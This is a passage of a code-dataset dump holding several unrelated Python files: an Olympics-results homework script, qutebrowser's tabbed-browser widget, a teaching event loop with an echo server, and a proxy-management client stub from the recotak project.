entry['result']\r\n })\r\n\r\n entries_by_competition = {x: entries_by_competition[x] for x in entries_by_competition\r\n if entries_by_competition[x]['entries']}\r\n\r\n return entries_by_competition\r\n\r\n\r\ndef calcCompetitionsResults(competitors_in_competitions):\r\n '''\r\n Given the data of the competitors, the function returns the champs countries for each competition.\r\n Arguments:\r\n competitors_in_competitions: A list that contains the data of the competitors\r\n (see readParseData return value for more info)\r\n Retuen value:\r\n A list of competitions and their champs (list of lists).\r\n Every record in the list contains the competition name and the champs, in the following format:\r\n [competition_name, winning_gold_country,\r\n winning_silver_country, winning_bronze_country]\r\n '''\r\n competitions_champs = []\r\n competitions = getValidEntriesByCompetition(competitors_in_competitions)\r\n # competitors = set([x['competitor id']\r\n # for x in competitors_in_competitions])\r\n\r\n for competition in competitions:\r\n competition_info = competitions[competition]\r\n if competition_info['type'] in ['knockout', 'timed']:\r\n reverse_results = False\r\n else:\r\n assert competition_info[\r\n 'type'] == 'untimed', f'Unknown competition type: {competition_info[\"type\"]}'\r\n reverse_results = True\r\n\r\n sorted_entries = sorted(competition_info['entries'], key=lambda x: x['result'],\r\n reverse=reverse_results)\r\n\r\n winning_countries = [x['competitor country'] for x in sorted_entries]\r\n\r\n competitions_champs.append(\r\n [competition]+(winning_countries+['undef_country']*2)[0:3])\r\n\r\n # TODO Part A, Task 3.5\r\n\r\n return competitions_champs\r\n\r\n\r\ndef partA(file_name='input.txt', allow_prints=True):\r\n # read and parse the input file\r\n competitors_in_competitions = readParseData(file_name)\r\n if allow_prints:\r\n for competitor in sorted(competitors_in_competitions, key=key_sort_competitor):\r\n printCompetitor(competitor)\r\n\r\n # calculate competition results\r\n competitions_results = calcCompetitionsResults(competitors_in_competitions)\r\n if allow_prints:\r\n for competition_result_single in sorted(competitions_results):\r\n printCompetitionResults(*competition_result_single)\r\n\r\n return competitions_results\r\n\r\n\r\ndef partB(file_name='input.txt'):\r\n competitions_results = partA(file_name, allow_prints=False)\r\n import Olympics\r\n olympics = Olympics.OlympicsCreate()\r\n\r\n for champ in competitions_results:\r\n Olympics.OlympicsUpdateCompetitionResults(\r\n olympics, str(champ[1]), str(champ[2]), str(champ[3]))\r\n\r\n Olympics.OlympicsWinningCountry(olympics)\r\n Olympics.OlympicsDestroy(olympics)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n '''\r\n The main part of the script.\r\n __main__ is the name of the scope in which top-level code executes.\r\n\r\n To run only a single part, comment the line below which correspondes to the part you don't want to run.\r\n '''\r\n file_name = 'input.txt'\r\n\r\n partA(file_name)\r\n partB(file_name)\r\n","sub_path":"hw2.py","file_name":"hw2.py","file_ext":"py","file_size_in_byte":8830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"574292832","text":"# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:\n\n# Copyright 2014 Florian Bruhin (The Compiler) \n#\n# This file is part of qutebrowser.\n#\n# qutebrowser is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# qutebrowser is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with qutebrowser. If not, see .\n\n\"\"\"The main tabbed browser widget.\"\"\"\n\nimport functools\nimport collections\n\nfrom PyQt5.QtWidgets import QSizePolicy\nfrom PyQt5.QtCore import pyqtSignal, pyqtSlot, QSize, QTimer, QUrl\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtWebKitWidgets import QWebPage\n\nfrom qutebrowser.config import config\nfrom qutebrowser.commands import cmdexc\nfrom qutebrowser.keyinput import modeman\nfrom qutebrowser.mainwindow import tabwidget\nfrom qutebrowser.browser import signalfilter, commands, webview\nfrom qutebrowser.utils import (log, message, usertypes, utils, qtutils, objreg,\n urlutils)\n\n\nUndoEntry = collections.namedtuple('UndoEntry', ['url', 'history'])\n\n\nclass TabbedBrowser(tabwidget.TabWidget):\n\n \"\"\"A TabWidget with QWebViews inside.\n\n Provides methods to manage tabs, convenience methods to interact with the\n current tab (cur_*) and filters signals to re-emit them when they occured\n in the currently visible tab.\n\n For all tab-specific signals (cur_*) emitted by a tab, this happens:\n - the signal gets filtered with _filter_signals and self.cur_* gets\n emitted if the signal occured in the current tab.\n\n Attributes:\n _win_id: The window ID this tabbedbrowser is associated with.\n _filter: A SignalFilter instance.\n _now_focused: The tab which is focused now.\n _tab_insert_idx_left: Where to insert a new tab with\n tabbar -> new-tab-position set to 'left'.\n _tab_insert_idx_right: Same as above, for 'right'.\n _undo_stack: List of UndoEntry namedtuples of closed tabs.\n\n Signals:\n cur_progress: Progress of the current tab changed (loadProgress).\n cur_load_started: Current tab started loading (loadStarted)\n cur_load_finished: Current tab finished loading (loadFinished)\n cur_statusbar_message: Current tab got a statusbar message\n (statusBarMessage)\n cur_url_text_changed: Current URL text changed.\n cur_link_hovered: Link hovered in current tab (linkHovered)\n cur_scroll_perc_changed: Scroll percentage of current tab changed.\n arg 1: x-position in %.\n arg 2: y-position in %.\n cur_load_status_changed: Loading status of current tab changed.\n close_window: The last tab was closed, close this window.\n resized: Emitted when the browser window has resized, so the completion\n widget can adjust its size to it.\n arg: The new size.\n current_tab_changed: The current tab changed to the emitted WebView.\n \"\"\"\n\n cur_progress = pyqtSignal(int)\n cur_load_started = pyqtSignal()\n cur_load_finished = pyqtSignal(bool)\n cur_statusbar_message = pyqtSignal(str)\n cur_url_text_changed = pyqtSignal(str)\n cur_link_hovered = pyqtSignal(str, str, str)\n cur_scroll_perc_changed = pyqtSignal(int, int)\n cur_load_status_changed = pyqtSignal(str)\n close_window = pyqtSignal()\n resized = pyqtSignal('QRect')\n got_cmd = pyqtSignal(str)\n current_tab_changed = pyqtSignal(webview.WebView)\n\n def __init__(self, win_id, parent=None):\n super().__init__(win_id, parent)\n self._win_id = win_id\n self._tab_insert_idx_left = 0\n self._tab_insert_idx_right = -1\n self.tabCloseRequested.connect(self.on_tab_close_requested)\n self.currentChanged.connect(self.on_current_changed)\n self.cur_load_started.connect(self.on_cur_load_started)\n self.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)\n self._undo_stack = []\n self._filter = signalfilter.SignalFilter(win_id, self)\n dispatcher = commands.CommandDispatcher(win_id)\n objreg.register('command-dispatcher', dispatcher, scope='window',\n window=win_id)\n self.destroyed.connect(\n functools.partial(objreg.delete, 'command-dispatcher',\n scope='window', window=win_id))\n self._now_focused = None\n # FIXME adjust this to font size\n # https://github.com/The-Compiler/qutebrowser/issues/119\n self.setIconSize(QSize(12, 12))\n objreg.get('config').changed.connect(self.update_favicons)\n\n def __repr__(self):\n return utils.get_repr(self, count=self.count())\n\n def widgets(self):\n \"\"\"Get a list of open tab widgets.\n\n We don't implement this as generator so we can delete tabs while\n iterating over the list.\n \"\"\"\n w = []\n for i in range(self.count()):\n w.append(self.widget(i))\n return w\n\n def _change_app_title(self, text):\n \"\"\"Change the window title based on the tab text.\"\"\"\n if not text:\n title = 'qutebrowser'\n else:\n title = '{} - qutebrowser'.format(text)\n self.window().setWindowTitle(title)\n\n def _connect_tab_signals(self, tab):\n \"\"\"Set up the needed signals for tab.\"\"\"\n page = tab.page()\n frame = page.mainFrame()\n # filtered signals\n tab.linkHovered.connect(\n self._filter.create(self.cur_link_hovered, tab))\n tab.loadProgress.connect(\n self._filter.create(self.cur_progress, tab))\n frame.loadFinished.connect(\n self._filter.create(self.cur_load_finished, tab))\n frame.loadStarted.connect(\n self._filter.create(self.cur_load_started, tab))\n tab.statusBarMessage.connect(\n self._filter.create(self.cur_statusbar_message, tab))\n tab.scroll_pos_changed.connect(\n self._filter.create(self.cur_scroll_perc_changed, tab))\n tab.url_text_changed.connect(\n self._filter.create(self.cur_url_text_changed, tab))\n tab.load_status_changed.connect(\n self._filter.create(self.cur_load_status_changed, tab))\n tab.url_text_changed.connect(\n functools.partial(self.on_url_text_changed, tab))\n # misc\n tab.titleChanged.connect(\n functools.partial(self.on_title_changed, tab))\n tab.iconChanged.connect(\n functools.partial(self.on_icon_changed, tab))\n tab.loadProgress.connect(\n functools.partial(self.on_load_progress, tab))\n frame.loadFinished.connect(\n functools.partial(self.on_load_finished, tab))\n frame.loadStarted.connect(\n functools.partial(self.on_load_started, tab))\n page.windowCloseRequested.connect(\n functools.partial(self.on_window_close_requested, tab))\n\n def current_url(self):\n \"\"\"Get the URL of the current tab.\n\n Intended to be used from command handlers.\n\n Return:\n The current URL as QUrl.\n \"\"\"\n widget = self.currentWidget()\n if widget is None:\n url = QUrl()\n else:\n url = widget.cur_url\n try:\n qtutils.ensure_valid(url)\n except qtutils.QtValueError as e:\n msg = \"Current URL is invalid\"\n if e.reason:\n msg += \" ({})\".format(e.reason)\n msg += \"!\"\n raise cmdexc.CommandError(msg)\n return url\n\n def shutdown(self):\n \"\"\"Try to shut down all tabs cleanly.\"\"\"\n try:\n self.currentChanged.disconnect()\n except TypeError:\n log.destroy.exception(\"Error while shutting down tabs\")\n for tab in self.widgets():\n self._remove_tab(tab)\n\n def close_tab(self, tab):\n \"\"\"Close a tab.\n\n Args:\n tab: The QWebView to be closed.\n \"\"\"\n last_close = config.get('tabs', 'last-close')\n if self.count() > 1:\n self._remove_tab(tab)\n elif last_close == 'close':\n self._remove_tab(tab)\n self.close_window.emit()\n elif last_close == 'blank':\n tab.openurl(QUrl('about:blank'))\n\n def _remove_tab(self, tab):\n \"\"\"Remove a tab from the tab list and delete it properly.\n\n Args:\n tab: The QWebView to be closed.\n \"\"\"\n idx = self.indexOf(tab)\n if idx == -1:\n raise ValueError(\"tab {} is not contained in TabbedWidget!\".format(\n tab))\n if tab is self._now_focused:\n self._now_focused = None\n if tab is objreg.get('last-focused-tab', None, scope='window',\n window=self._win_id):\n objreg.delete('last-focused-tab', scope='window',\n window=self._win_id)\n if tab.cur_url.isValid():\n history_data = qtutils.serialize(tab.history())\n entry = UndoEntry(tab.cur_url, history_data)\n self._undo_stack.append(entry)\n elif tab.cur_url.isEmpty():\n # There are some good reasons why an URL could be empty\n # (target=\"_blank\" with a download, see [1]), so we silently ignore\n # this.\n # [1] https://github.com/The-Compiler/qutebrowser/issues/163\n pass\n else:\n # We display a warnings for URLs which are not empty but invalid -\n # but we don't return here because we want the tab to close either\n # way.\n urlutils.invalid_url_error(self._win_id, tab.cur_url, \"saving tab\")\n tab.shutdown()\n self.removeTab(idx)\n tab.deleteLater()\n\n def undo(self):\n \"\"\"Undo removing of a tab.\"\"\"\n url, history_data = self._undo_stack.pop()\n newtab = self.tabopen(url)\n qtutils.deserialize(history_data, newtab.history())\n\n @pyqtSlot('QUrl', bool)\n def openurl(self, url, newtab):\n \"\"\"Open a URL, used as a slot.\n\n Args:\n url: The URL to open as QUrl.\n newtab: True to open URL in a new tab, False otherwise.\n \"\"\"\n qtutils.ensure_valid(url)\n if newtab:\n self.tabopen(url, background=False)\n else:\n self.currentWidget().openurl(url)\n\n @pyqtSlot(int)\n def on_tab_close_requested(self, idx):\n \"\"\"Close a tab via an index.\"\"\"\n tab = self.widget(idx)\n if tab is None:\n log.webview.debug(\"Got invalid tab {} for index {}!\".format(\n tab, idx))\n return\n self.close_tab(tab)\n\n @pyqtSlot(webview.WebView)\n def on_window_close_requested(self, widget):\n \"\"\"Close a tab with a widget given.\"\"\"\n self.close_tab(widget)\n\n @pyqtSlot('QUrl', bool)\n def tabopen(self, url=None, background=None, explicit=False):\n \"\"\"Open a new tab with a given URL.\n\n Inner logic for open-tab and open-tab-bg.\n Also connect all the signals we need to _filter_signals.\n\n Args:\n url: The URL to open as QUrl or None for an empty tab.\n background: Whether to open the tab in the background.\n if None, the background-tabs setting decides.\n explicit: Whether the tab was opened explicitely.\n If this is set, the new position might be different. With\n the default settings we handle it like Chromium does:\n - Tabs from clicked links etc. are to the right of\n the current.\n - Explicitely opened tabs are at the very right.\n\n Return:\n The opened WebView instance.\n \"\"\"\n if url is not None:\n qtutils.ensure_valid(url)\n log.webview.debug(\"Creating new tab with URL {}\".format(url))\n if config.get('tabs', 'tabs-are-windows') and self.count() > 0:\n from qutebrowser.mainwindow import mainwindow\n window = mainwindow.MainWindow.spawn()\n tabbed_browser = objreg.get('tabbed-browser', scope='window',\n window=window)\n return tabbed_browser.tabopen(url, background, explicit)\n tab = webview.WebView(self._win_id, self)\n self._connect_tab_signals(tab)\n idx = self._get_new_tab_idx(explicit)\n self.insertTab(idx, tab, \"\")\n if url is not None:\n tab.openurl(url)\n if background is None:\n background = config.get('tabs', 'background-tabs')\n if not background:\n self.setCurrentWidget(tab)\n tab.show()\n return tab\n\n def _get_new_tab_idx(self, explicit):\n \"\"\"Get the index of a tab to insert.\n\n Args:\n explicit: Whether the tab was opened explicitely.\n\n Return:\n The index of the new tab.\n \"\"\"\n if explicit:\n pos = config.get('tabs', 'new-tab-position-explicit')\n else:\n pos = config.get('tabs', 'new-tab-position')\n if pos == 'left':\n idx = self._tab_insert_idx_left\n # On first sight, we'd think we have to decrement\n # self._tab_insert_idx_left here, as we want the next tab to be\n # *before* the one we just opened. However, since we opened a tab\n # *to the left* of the currently focused tab, indices will shift by\n # 1 automatically.\n elif pos == 'right':\n idx = self._tab_insert_idx_right\n self._tab_insert_idx_right += 1\n elif pos == 'first':\n idx = 0\n elif pos == 'last':\n idx = -1\n else:\n raise ValueError(\"Invalid new-tab-position '{}'.\".format(pos))\n log.webview.debug(\"new-tab-position {} -> opening new tab at {}, \"\n \"next left: {} / right: {}\".format(\n pos, idx, self._tab_insert_idx_left,\n self._tab_insert_idx_right))\n return idx\n\n @pyqtSlot(str, int)\n def search(self, text, flags):\n \"\"\"Search for text in the current page.\n\n Args:\n text: The text to search for.\n flags: The QWebPage::FindFlags.\n \"\"\"\n log.webview.debug(\"Searching with text '{}' and flags \"\n \"0x{:04x}.\".format(text, int(flags)))\n widget = self.currentWidget()\n old_scroll_pos = widget.scroll_pos\n found = widget.findText(text, flags)\n if not found and not flags & QWebPage.HighlightAllOccurrences and text:\n message.error(self._win_id, \"Text '{}' not found on \"\n \"page!\".format(text), immediately=True)\n else:\n backward = int(flags) & QWebPage.FindBackward\n\n def check_scroll_pos():\n \"\"\"Check if the scroll position got smaller and show info.\"\"\"\n if not backward and widget.scroll_pos < old_scroll_pos:\n message.info(self._win_id, \"Search hit BOTTOM, continuing \"\n \"at TOP\", immediately=True)\n elif backward and widget.scroll_pos > old_scroll_pos:\n message.info(self._win_id, \"Search hit TOP, continuing at \"\n \"BOTTOM\", immediately=True)\n # We first want QWebPage to refresh.\n QTimer.singleShot(0, check_scroll_pos)\n\n @config.change_filter('tabs', 'show-favicons')\n def update_favicons(self):\n \"\"\"Update favicons when config was changed.\"\"\"\n show = config.get('tabs', 'show-favicons')\n for i, tab in enumerate(self.widgets()):\n if show:\n self.setTabIcon(i, tab.icon())\n else:\n self.setTabIcon(i, QIcon())\n\n @pyqtSlot()\n def on_load_started(self, tab):\n \"\"\"Clear icon when a tab started loading.\n\n Args:\n tab: The tab where the signal belongs to.\n \"\"\"\n try:\n idx = self.indexOf(tab)\n except RuntimeError:\n # We can get signals for tabs we already deleted...\n return\n if idx == -1:\n # We can get signals for tabs we already deleted...\n log.webview.debug(\"Got invalid tab {}!\".format(tab))\n return\n self.setTabIcon(idx, QIcon())\n\n @pyqtSlot()\n def on_cur_load_started(self):\n \"\"\"Leave insert/hint mode when loading started.\"\"\"\n modeman.maybe_leave(self._win_id, usertypes.KeyMode.insert,\n 'load started')\n modeman.maybe_leave(self._win_id, usertypes.KeyMode.hint,\n 'load started')\n\n @pyqtSlot(webview.WebView, str)\n def on_title_changed(self, tab, text):\n \"\"\"Set the title of a tab.\n\n Slot for the titleChanged signal of any tab.\n\n Args:\n tab: The WebView where the title was changed.\n text: The text to set.\n \"\"\"\n if not text:\n log.webview.debug(\"Ignoring title change to '{}'.\".format(text))\n return\n try:\n idx = self.indexOf(tab)\n except RuntimeError:\n # We can get signals for tabs we already deleted...\n return\n log.webview.debug(\"Changing title for idx {} to '{}'\".format(\n idx, text))\n if idx == -1:\n # We can get signals for tabs we already deleted...\n log.webview.debug(\"Got invalid tab {}!\".format(tab))\n return\n self.setTabText(idx, text.replace('&', '&&'))\n if idx == self.currentIndex():\n self._change_app_title(text)\n\n @pyqtSlot(webview.WebView, str)\n def on_url_text_changed(self, tab, url):\n \"\"\"Set the new URL as title if there's no title yet.\n\n Args:\n tab: The WebView where the title was changed.\n url: The new URL.\n \"\"\"\n try:\n idx = self.indexOf(tab)\n except RuntimeError:\n # We can get signals for tabs we already deleted...\n return\n if idx == -1:\n # We can get signals for tabs we already deleted...\n log.webview.debug(\"Got invalid tab {}!\".format(tab))\n return\n if not self.tabText(idx):\n self.setTabText(idx, url)\n\n @pyqtSlot(webview.WebView)\n def on_icon_changed(self, tab):\n \"\"\"Set the icon of a tab.\n\n Slot for the iconChanged signal of any tab.\n\n Args:\n tab: The WebView where the title was changed.\n \"\"\"\n if not config.get('tabs', 'show-favicons'):\n return\n try:\n idx = self.indexOf(tab)\n except RuntimeError:\n # We can get signals for tabs we already deleted...\n return\n if idx == -1:\n # We can get *_changed signals for tabs we already deleted...\n log.webview.debug(\"Got invalid tab {}!\".format(tab))\n return\n self.setTabIcon(idx, tab.icon())\n\n @pyqtSlot(usertypes.KeyMode)\n def on_mode_left(self, mode):\n \"\"\"Give focus to current tab if command mode was left.\"\"\"\n if mode == usertypes.KeyMode.command:\n widget = self.currentWidget()\n log.modes.debug(\"Left command mode, focusing {!r}\".format(widget))\n if widget is None:\n return\n widget.setFocus()\n\n @pyqtSlot(int)\n def on_current_changed(self, idx):\n \"\"\"Set last-focused-tab and leave hinting mode when focus changed.\"\"\"\n if idx == -1:\n # closing the last tab (before quitting)\n return\n tab = self.widget(idx)\n log.modes.debug(\"Current tab changed, focusing {!r}\".format(tab))\n tab.setFocus()\n for mode in (usertypes.KeyMode.hint, usertypes.KeyMode.insert):\n modeman.maybe_leave(self._win_id, mode, 'tab changed')\n if self._now_focused is not None:\n objreg.register('last-focused-tab', self._now_focused, update=True,\n scope='window', window=self._win_id)\n self._now_focused = tab\n self.current_tab_changed.emit(tab)\n self._change_app_title(self.tabText(idx))\n self._tab_insert_idx_left = self.currentIndex()\n self._tab_insert_idx_right = self.currentIndex() + 1\n\n @pyqtSlot()\n def on_cmd_return_pressed(self):\n \"\"\"Set focus when the commandline closes.\"\"\"\n log.modes.debug(\"Commandline closed, focusing {!r}\".format(self))\n\n def on_load_progress(self, tab, perc):\n \"\"\"Adjust tab indicator on load progress.\"\"\"\n try:\n idx = self.indexOf(tab)\n except RuntimeError:\n # We can get signals for tabs we already deleted...\n return\n start = config.get('colors', 'tabs.indicator.start')\n stop = config.get('colors', 'tabs.indicator.stop')\n system = config.get('colors', 'tabs.indicator.system')\n color = utils.interpolate_color(start, stop, perc, system)\n self.tabBar().set_tab_indicator_color(idx, color)\n\n def on_load_finished(self, tab):\n \"\"\"Adjust tab indicator when loading finished.\n\n We don't take loadFinished's ok argument here as it always seems to be\n true when the QWebPage has an ErrorPageExtension implemented.\n See https://github.com/The-Compiler/qutebrowser/issues/84\n \"\"\"\n try:\n idx = self.indexOf(tab)\n except RuntimeError:\n # We can get signals for tabs we already deleted...\n return\n if tab.page().error_occured:\n color = config.get('colors', 'tabs.indicator.error')\n else:\n start = config.get('colors', 'tabs.indicator.start')\n stop = config.get('colors', 'tabs.indicator.stop')\n system = config.get('colors', 'tabs.indicator.system')\n color = utils.interpolate_color(start, stop, 100, system)\n self.tabBar().set_tab_indicator_color(idx, color)\n\n def resizeEvent(self, e):\n \"\"\"Extend resizeEvent of QWidget to emit a resized signal afterwards.\n\n Args:\n e: The QResizeEvent\n \"\"\"\n super().resizeEvent(e)\n self.resized.emit(self.geometry())\n","sub_path":"qutebrowser-git/pkg/qutebrowser-git/usr/lib/python3.4/site-packages/qutebrowser/mainwindow/tabbedbrowser.py","file_name":"tabbedbrowser.py","file_ext":"py","file_size_in_byte":22723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"354901682","text":"import socket\nfrom collections import deque\nfrom typing import Any, Coroutine\nfrom inspect import iscoroutine\nfrom selectors import DefaultSelector, EVENT_READ, EVENT_WRITE\n\n\nclass EventLoopException(Exception):\n pass\n\n\nclass Future:\n def __init__(self):\n self.future_result = None\n\n def set_result(self, result: Any):\n if self.future_result is not None:\n raise EventLoopException('Object future already resolved')\n\n self.future_result = result\n\n def done(self):\n return self.future_result is None\n\n def result(self):\n if self.future_result is None:\n raise EventLoopException('Result is not set')\n\n return self.future_result\n\n\nclass Task(Future):\n def __init__(self, coro: Coroutine):\n super().__init__()\n\n if not iscoroutine(coro):\n raise EventLoopException('Object coro is not native coroutine')\n\n self.coro = coro\n\n\nclass EventLoop:\n def __init__(self):\n self.selector = DefaultSelector()\n self.tasks = []\n\n def create_task(self, coro: Coroutine):\n task = Task(coro)\n self.tasks.append(task)\n\n def run_forever(self):\n if not self.tasks:\n raise EventLoopException('There are no tasks for running')\n\n\nclass EventLoopExample:\n \"\"\"\n Событийный цикл, который использует очередь с двухсторонним доступом\n Цикл опрашивает селектор на предмет готовности событий для чтения и записи\n в сокет\n \"\"\"\n def __init__(self):\n \"\"\"\n Конструктор событийного цикла, который хранит очередь\n :return:\n \"\"\"\n self.ready = deque()\n self.selector = DefaultSelector()\n self.current_task = None\n\n def read_wait(self, sock):\n yield 'read_wait', sock\n\n def write_wait(self, sock):\n yield 'write_wait', sock\n\n async def sock_recv(self, sock, max_bytes: int):\n \"\"\"\n курутина для чтения данных из сокета в асинхронный способ\n :param sock: дескриптор сокета\n :param max_bytes: максимальное количество байт, которые могут быть\n прочитаны за один раз без блокировки\n :return: принятые из сокета данные в банарном виде\n \"\"\"\n await self.read_wait(sock)\n return sock.recv(max_bytes)\n\n async def sock_accept(self, sock):\n await self.read_wait(sock)\n return sock.accept()\n\n async def sock_sendall(self, sock, data):\n while data:\n try:\n n_sent = sock.send(data)\n data = data[n_sent:]\n except BlockingIOError:\n await self.write_wait(sock)\n\n def create_task(self, coro):\n self.ready.append(coro)\n\n def run_forever(self):\n while True:\n while not self.ready:\n events = self.selector.select()\n for key, _ in events:\n self.ready.append(key.data)\n self.selector.unregister(key.fileobj)\n\n while self.ready:\n self.current_task = self.ready.popleft()\n try:\n # запускаем генератор до появления yield\n op, *args = self.current_task.send(None)\n getattr(self, op)(*args)\n except StopIteration:\n pass\n\n def read_wait(self, sock):\n self.selector.register(sock, EVENT_READ, self.current_task)\n\n def write_wait(self, sock):\n self.selector.register(sock, EVENT_WRITE, self.current_task)\n\n\nasync def echo_handler(client_sock, loop):\n\n # дескриптор сокета поддерживает менеджер контекстов\n with client_sock:\n while True:\n # читаем данные асинхронно по 1024 байт\n data = await loop.sock_recv(client_sock, 1024)\n\n print(str.format('[~] Client send: {}', data.decode()))\n\n # признак завершения передачи данных от клиента None при\n # socket.recv()\n if not data or 'bye' in data.decode():\n break\n\n # отправляем данные асинхронно в клиентское соединение\n await loop.sock_sendall(client_sock, b'Got: ' + data)\n\n print('[~] Client connection closed')\n\n\nasync def echo_tcp_server(address: tuple, loop: EventLoop):\n sock = socket.socket()\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.bind(address)\n sock.listen(5)\n sock.setblocking(False)\n\n print(str.format('[~] TCP echo server is running on: {}:{}', *address))\n\n while True:\n client_sock, client_address = await loop.sock_accept(sock)\n print(str.format(\n '[~] Connection from: {}', client_address\n ))\n\n # добавляем в событийный цикл задачу по обработке клиентского\n # подключения в событийном цикле loop\n loop.create_task(echo_handler(client_sock, loop))\n\n\ndef main():\n address = ('', 25000)\n\n # создаем экземпляр событийного цикла\n loop = EventLoopExample()\n\n # сервер представлен курутиной, которую необходимо добавить в событийный\n # цикл; метод возвращает объе��т класса Task\n loop.create_task(echo_tcp_server(address, loop))\n\n # запускаем событийный цикл на бесконечное выполнение\n try:\n loop.run_forever()\n except KeyboardInterrupt:\n print('[!] Pressed Ctrl + C')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"spl/selectors_module/event_loop.py","file_name":"event_loop.py","file_ext":"py","file_size_in_byte":6106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"377233692","text":"\"\"\"\na stub for remote proxy\n# Copyright (c) 2014, curesec GmbH\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without modification,\n# are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice, this list of\n# conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above copyright notice, this list\n# of conditions and the following disclaimer in the documentation and/or other materials\n# provided with the distribution.\n#\n# 3. Neither the name of the copyright holder nor the names of its contributors may be used\n# to endorse or promote products derived from this software without specific prior written\n# permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS\n# OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\n# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR\n# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nA proxy is used in order to forward plugins' traffic through it. They are\norganised in chains, so the traffice flows through a list of proxies.\n\n\"\"\"\n\nimport reco_client.connection.comm as comm\n#from reco_client.connection.comm import comm.sendpacket\n#from reco_client.connection.comm import comm.ccdlib\n\nimport logging\nlogger = logging.getLogger(\"client.%s\" % __name__)\n\nclass Proxy():\n \"\"\"\n A proxy is an object that is assigned to a proxy chain. Every proxy has an\n address and a protocol that is spoken.\n\n A proxy has the following attributes:\n\n pxid id of the proxy\n ip ip or domain of the proxy listens to\n port port the proxy listens to\n protocol the protocol the proxy is addressable with (at the moment\n only s4 supported)\n description some descriptive words\n\n \"\"\"\n\n def __init__(self, pxid, ip, port, protocol, description):\n \"\"\" create a new proxy object without adding it to database \"\"\"\n self.pxid = pxid\n self.ip = ip\n self.port = port\n self.protocol = protocol\n self.description = description\n\n def __str__(self):\n res = \"\\t%s (%s) - \" % (self.pxid, self.description)\n res += \"%s://\" % self.protocol\n res += \"%s:%d\" % (self.ip, self.port)\n\n return res\n\ndef new_proxy(client, protocol, ip, port, description):\n \"\"\"\n create a new proxy\n\n input:\n protocol protocol the proxy is addressable with\n ip ip or domain of the proxy\n port port the proxy listens to\n description short description of the proxy\n\n output:\n proxy id\n\n \"\"\"\n try:\n pld = dict(ip=ip,\n port=port,\n protocol=protocol,\n description=description)\n except (KeyError, ValueError):\n return (\"Invalid input. Example: new proxy protocol://\"\n \"ip:port proxy_name\")\n\n # send request\n resp_t = comm.sendpacket(client, op=comm.ccdlib.OP_NEWPROXY, pld=pld)\n\n # create proxy object\n proxy = Proxy(pxid=resp_t[-1], **pld)\n\n # cache\n client.proxies[proxy.pxid] = proxy\n\n return proxy.pxid\n\ndef del_proxy(client, proxyid):\n \"\"\"\n delete proxy\n\n input:\n proxyid id of the proxy\n\n output:\n payload of server response\n\n \"\"\"\n\n # build request\n if not proxyid in client.proxies:\n raise KeyError()\n pld = dict(pxid=proxyid)\n\n # send request\n resp_t = comm.sendpacket(client, op=comm.ccdlib.OP_DELPROXY, pld=pld)\n\n # delete from cache\n del client.proxies[pld[\"pxid\"]]\n\n return resp_t[-1]\n\ndef print_proxies(client):\n \"\"\" show proxies \"\"\"\n\n updateProxyList(client)\n\n for proxy in client.proxies.values():\n print(str(proxy))\n\ndef updateProxyList(client):\n \"\"\" ask server for configured proxies \"\"\"\n resp_t = comm.sendpacket(client, op=comm.ccdlib.OP_SHOWPROXY)\n\n for p in resp_t[-1]:\n try:\n proxy = Proxy(pxid=p[\"pxid\"],\n ip=p[\"ip\"],\n port=int(p[\"port\"]),\n protocol=p[\"protocol\"],\n description=p[\"description\"])\n client.proxies[proxy.pxid] = proxy\n except (KeyError, ValueError):\n logger.warning(\"Received invalid json packet!\")\n","sub_path":"recotak/reco_client/reco_client/remote/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":4924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"178251240","text":"\"\"\"\nThe dataset in this directory is almost identical to the original but:\n\n* 207 values were randomly removed from the `total_bedrooms` column\n so we can discuss what to do with missing data.\n* An additional categorical attribute called `ocean_proximity` was added\n indicating (very roughly) whether each block group is near the ocean\n near the Bay area, inland or on an island.\n > This allows discussing what to do with categorical data.\n\nNote that the block groups are called \"districts\" simply because in\nsome contexts the name \"block group\" was confusing.\n\nIt is clearly a typical supervised learning task seeing the given labeled\ntraining examples (each instance comes with the expected output, i.e.,\nthe district’s median housing price). Moreover, it is also a typical regression\ntask, since you are asked to predict a value. More specifically, this is a\nmultivariate regression problem since the system will use multiple features 